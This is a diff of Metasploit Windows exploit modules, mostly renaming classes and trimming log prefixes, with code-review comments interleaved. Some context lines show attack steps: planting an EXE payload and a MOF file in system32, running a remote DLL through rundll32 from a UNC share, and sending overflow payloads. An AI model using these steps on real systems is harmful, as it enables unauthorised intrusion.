a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 383d1e5503..5d41f38d8d 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb 
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index dfa2e33ca2..a18abfeb57 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index 5f4aaf27a6..ef8ca5f737 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb index 70c5c32675..163488bdd5 100644 --- a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb +++ b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb index d61bc8c168..b73941ecee 100644 --- a/modules/exploits/windows/misc/avidphoneticindexer.rb 
+++ b/modules/exploits/windows/misc/avidphoneticindexer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index f7ef75924e..33623a6a2e 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index 6647a2e608..b83075517a 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index a63b9bd4fa..a485c3f977 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 49e364a014..2cfbdcfe73 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index c064c4be86..2a727d37ea 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp 
@@ -96,26 +96,26 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") register_file_for_cleanup(exe_name) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") end diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index 4bf8ff8fcf..e0fd894ab6 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb 
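Review bot: The failure branch for the MOF upload still tests `res =~ /#{exe_name}/`, which looks copied from the EXE branch above it. If the server's error reply echoes the name of the file being written, the "check the DEPTH option" hint cannot fire for the MOF; the condition should presumably read `res =~ /#{Regexp.escape(mof_name)}/`. Escaping matters in both branches, because the interpolated name contains a `.` that the regex treats as a wildcard. Separately, `register_file_for_cleanup(exe_name)` is reached only when the MOF upload succeeds, so an EXE that was already written stays on the tested host when the second upload fails; registering it right after the first `print_good` would avoid that. The enclosing method starts and ends outside the hunk.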
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 9db3b25a2f..fa53f1bdc9 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index 1bc230ad4c..55a2bb646b 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index 2f5d35ae39..c792582b39 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 0da0bbad83..c994706c67 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index e354c56925..d744dd9c5f 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 4ddb6beb1f..b67a2c6433 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index f64248b583..e67cc1e95e 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 31ed2b4605..5d48e0a692 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp 
diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 66d3145b80..373922133a 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index 2d36e4ee08..8741273ee4 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 9130d3ad0a..388c996923 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index c5cc523440..bcc0102e7b 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index ba6caf4a42..5e7b5c8e0b 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index f3d90b8117..b5c78fb561 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 9c59408ddc..8d61c18476 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 084c331db4..df7c0adc8e 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index f0ccc69f63..d913136f3b 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index d85485c26a..2bcac14761 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index fca3bb11bf..db3949ec51 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 2fa4784861..d5e6c095ef 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index b8fc3c811f..cf29c3b2d6 100644 
--- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = generate_payload_dll print_status("File available on #{unc}...") - print_status("#{peer} - Trying to execute remote DLL...") + print_status("Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index 7dd833c3c0..d600cbbad1 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb index 807267a2c2..2e1c591fd1 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp 
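Review bot: In the `check` hunk of hp_dataprotector_cmd_exec.rb, `minor = $1.to_i` reads the global match variable set by the `=~` in the preceding `if`, which is easy to break if another match is ever inserted between the two lines. A named capture or `minor = Regexp.last_match(1).to_i` makes the dependency explicit. The same pattern appears in the `check` hunks of hp_dataprotector_exec_bar.rb and hp_dataprotector_traversal.rb. `fingerprint` is assigned outside the hunk; if it is taken from the remote banner, a short comment saying it is untrusted text echoed to the console would help the next reader.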
diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index cfa69e5d2f..c00f1e774e 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") exec_bar(datastore['CMDPATH'], command, "\x00") end end diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index 0286f2ec02..65676817b8 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index b43d9af842..779082e32e 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb 
+++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -92,11 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote mof = generate_mof(mof_name, vbs_name) # We can't upload binary contents, so embedding the exe into a VBS. - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") + print_status("Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") upload_file("windows\\system32\\#{vbs_name}", vbs) register_file_for_cleanup(vbs_name) - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") + print_status("Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb index 8055b0d947..6ba32d2958 100644 --- a/modules/exploits/windows/misc/hp_imc_uam.rb +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index fb664c9ae6..7f7d4d2696 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb 
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'SSL3', 'PrependMigrate' => true }, 'Payload' => diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index 80b04a5bdc..041554ef94 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote { 'EXITFUNC' => 'seh', 'SSL' => true, - 'SSLVersion' => 'SSL3' }, 'Payload' => { diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index b168c6ff5a..6da50b07fa 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 404dd0458a..f5dbf7bd77 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index f8aeca8a72..e0332ba2a2 100644 
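Review bot: The removal of `'SSLVersion' => 'SSL3'` from `DefaultOptions` in hp_loadrunner_magentproc.rb is not explained in the hunk, so a reader cannot tell whether the module now relies on the framework's default protocol negotiation on purpose. A one-line comment next to `'SSL' => true`, such as `# SSLVersion intentionally left at the framework default (SSL3 pin removed)`, would record the intent. The same removal in hp_magentservice.rb leaves `'SSL' => true,` as the last hash entry with a trailing comma, which is valid Ruby but differs from the other hashes visible in that hunk.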
--- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index 2670342a6c..4128ceaf0c 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 25e196293b..a7e2b6619a 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -134,10 +134,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -157,11 +157,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end 
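Review bot: In the hp_operations_agent_coda_34.rb hunk at `@@ -134,10`, the context line `peer = "#{rhost}:#{rport}"` assigns a local that no visible line uses any more, now that the `#{peer} - ` prefixes are gone from the `print_status` and `print_error` calls. Other modules in this diff call `peer` as a helper (for example in `fail_with` messages), so this local also shadows it. If nothing later in the method reads it, the assignment can be deleted. The method body continues outside the hunk, so that needs checking first. hp_operations_agent_coda_8c.rb has the identical line in its `@@ -136,10` hunk.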
@@ -197,7 +197,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index f38eeb33a9..704f3f28c4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -136,10 +136,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -159,11 +159,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -199,7 +199,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering 